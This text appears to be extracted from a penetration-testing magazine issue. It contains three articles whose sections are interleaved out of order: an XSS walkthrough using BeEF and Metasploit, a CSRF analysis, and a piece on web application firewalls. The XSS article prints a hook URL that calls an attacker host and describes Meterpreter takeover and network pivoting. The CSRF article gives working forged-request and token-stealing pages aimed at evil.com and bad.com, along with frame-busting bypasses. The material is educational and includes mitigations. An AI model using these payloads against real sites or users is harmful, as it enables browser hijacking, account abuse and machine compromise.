Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check whether BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter; the screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
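The encoding step can be illustrated in a few lines. The vulnerable example in this article is PHP; this sketch uses Ruby's standard CGI library instead, and `render_search_result` is a hypothetical helper name for the echo step of the search page.

```ruby
require 'cgi'

# HTML-escape user-controlled data before reflecting it, so injected
# markup is rendered as inert text instead of being executed.
def render_search_result(user_input)
  "The parameter passed is #{CGI.escapeHTML(user_input)}"
end
```

Called with `<script>alert(document.domain)</script>`, this returns the text with the tag escaped to `&lt;script&gt;...&lt;/script&gt;`, so the browser displays it instead of running it.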
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So, while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an information security professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development (Perl, Ruby on Rails), while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack, but this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are weak defenses:

• Only accepting POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to type the text in a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1 HTML code used to bypass the protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message"
           value="I like www.evil.com" />
    <input type="submit" />
  </form>
  <script>document.Form.submit()</script>
</div>
WEB APP VULNERABILITIES
index.php (Victim website)
And here is the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4).
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
One-time tokens are stored in a hidden field of the webpage form and in a session at the same time, so that the two values can be compared after the form is submitted.

Subverting one-time tokens is usually attempted with brute-force attacks. Brute-forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code generates a token:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
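The PHP snippet above seeds the token from md5(uniqid(rand(), TRUE)), which is predictable by modern standards. As a language-neutral sketch of the same "token in session plus hidden field" idea, assuming a CSPRNG-backed generator (Python's secrets module here; the session dict is a hypothetical stand-in for $_SESSION):

```python
import secrets

def generate_token() -> str:
    """Generate an unpredictable one-time token using a CSPRNG."""
    return secrets.token_hex(16)  # 32 hex characters, 128 bits of entropy

# The token is stored in the server-side session *and* echoed into a
# hidden form field; the two copies are compared on form submission.
token = generate_token()
session = {"token": token}   # stand-in for PHP's $_SESSION
hidden_field_value = token   # value to embed in the hidden <input>
```

Because the attacker's page cannot read the victim site's response (same-origin policy), it has no way to learn the per-session token it would need to forge the request.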
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>".$message;
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
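A side note on Listing 3: comparing tokens with == is not constant-time, so in principle the check can leak timing information. A hedged sketch of a timing-safe comparison, with Python's hmac.compare_digest standing in (the function name and sample tokens are illustrative):

```python
import hmac

def token_is_valid(session_token: str, posted_token: str) -> bool:
    # hmac.compare_digest compares in constant time, so an attacker
    # cannot learn how many leading characters were guessed correctly.
    return hmac.compare_digest(session_token, posted_token)

print(token_is_valid("a3f1", "a3f1"))  # True
print(token_is_valid("a3f1", "a3f2"))  # False
```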
Common counter-action statements are the following:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = "URL"
document.write('')
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
The best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser: the page simply remains hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his work to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide. They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. To facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of ever more powerful applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly and simply as possible, and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall will provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries, and thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much knowledge they had.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications, a responsibility which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards retroactively.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. Consider a program that had not processed its inputs and outputs via centralized interfaces and is to be enhanced so that the data can be checked: it is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis: that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing Web Application Security.
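The caveat above, that filtering special characters does not always stop SQL injection, can be illustrated with a toy sketch. The filter, parameter values and query below are hypothetical, not any real WAF's rule syntax:

```python
def naive_waf_filter(value: str) -> str:
    """Toy WAF rule: strip single quotes (the 'inverted commas')."""
    return value.replace("'", "")

# A string-context injection loses its quotes and breaks...
blocked = naive_waf_filter("' OR '1'='1")        # -> " OR 1=1"

# ...but a numeric-context injection needs no quotes at all,
# so the naive rule passes it through unchanged:
passed = naive_waf_filter("1 OR 1=1")
query = "SELECT * FROM users WHERE id = " + passed  # still injectable
```

This is exactly why the article insists on analyzing the application before configuring the WAF rather than relying on blanket character filtering.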
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and permitted value range.
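The parameter rules described above (expected parameter count, maximum length, permitted characters) can be sketched as follows. This is a minimal illustration; FORM_RULES, the field names and the limits are hypothetical, not any vendor's rule syntax:

```python
import re

# Hypothetical rule set for one monitored form: expected parameter
# names, a maximum length and a permitted character class for each.
FORM_RULES = {
    "message": {"max_len": 256, "pattern": re.compile(r"^[\w .,!?-]*$")},
    "token":   {"max_len": 32,  "pattern": re.compile(r"^[0-9a-f]*$")},
}

def request_allowed(params: dict) -> bool:
    """Block requests with unexpected, oversized or malformed parameters."""
    if set(params) != set(FORM_RULES):   # wrong parameter names or count
        return False
    return all(
        len(v) <= FORM_RULES[k]["max_len"]
        and FORM_RULES[k]["pattern"].match(v) is not None
        for k, v in params.items()
    )
```

A request carrying an extra third parameter, an oversized value, or characters outside the permitted class would be rejected before it ever reaches the application.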
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
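The combined model described above, a learned whitelist for high-value pages backed by a generic blacklist everywhere, can be sketched like this. It is a toy illustration; the URLs, parameter names and attack signatures are hypothetical:

```python
import re

# Hypothetical combined model: a learned whitelist of URL -> allowed
# parameter names for high-value pages, backed by a generic blacklist
# of known-bad signatures applied to every request.
WHITELIST = {"/order.php": {"item_id", "qty"}}
BLACKLIST = [re.compile(p, re.I) for p in
             (r"<script", r"union\s+select", r"\.\./")]

def check(url: str, params: dict) -> str:
    if url in WHITELIST and set(params) - WHITELIST[url]:
        return "block"                 # positive model: unknown parameter
    for value in params.values():
        if any(rx.search(value) for rx in BLACKLIST):
            return "block"             # negative model: known signature
    return "allow"
```

Pages outside the whitelist still get the blacklist check, while the order page additionally rejects any parameter that was never learned.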
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even once the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are only available in this mode: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests into the web application's hidden URLs. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured to match the respective conditions; penetration tests help with the correct configuration.

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data where the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
In most commercial penetration testing reports, it's sufficient to just show a small alert popup; this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this.
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2. BeEF after configuration
Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.
Figure 1. User enters a script in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters a short piece of JavaScript into the box, the JavaScript will execute on the user's machine instead of being displayed. The user hence just has to be tricked into clicking on a link such as: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
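Conceptually, hooking a browser just means injecting a script that makes the victim's browser phone home to the controller and poll for commands. The sketch below is purely illustrative of that idea, not BeEF's actual hook code; the controller URL and field names are invented:

```javascript
// Illustrative sketch only: BeEF's real hook script is far more elaborate.
// A hooked browser repeatedly beacons basic fingerprint data back to the
// controller, then polls for command modules to execute.
function buildHookBeacon(controllerUrl, browserInfo) {
  const params = new URLSearchParams({
    ua: browserInfo.userAgent,    // browser fingerprint
    cookies: browserInfo.cookie,  // session cookies of the hooked page
    page: browserInfo.location,   // where the hook is running
  });
  return controllerUrl + '?' + params.toString();
}

// In a real hook this would fire on a timer via XMLHttpRequest or an Image:
const beacon = buildHookBeacon('http://192.168.56.101/beef/command', {
  userAgent: 'Mozilla/5.0',
  cookie: 'PHPSESSID=abc123',
  location: 'http://localhost/search1.php',
});
console.log(beacon);
```

The controller's reply would then be evaluated in the victim's browser, which is what turns a one-off XSS into persistent control.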
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been completely rewritten and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory.
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current Web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
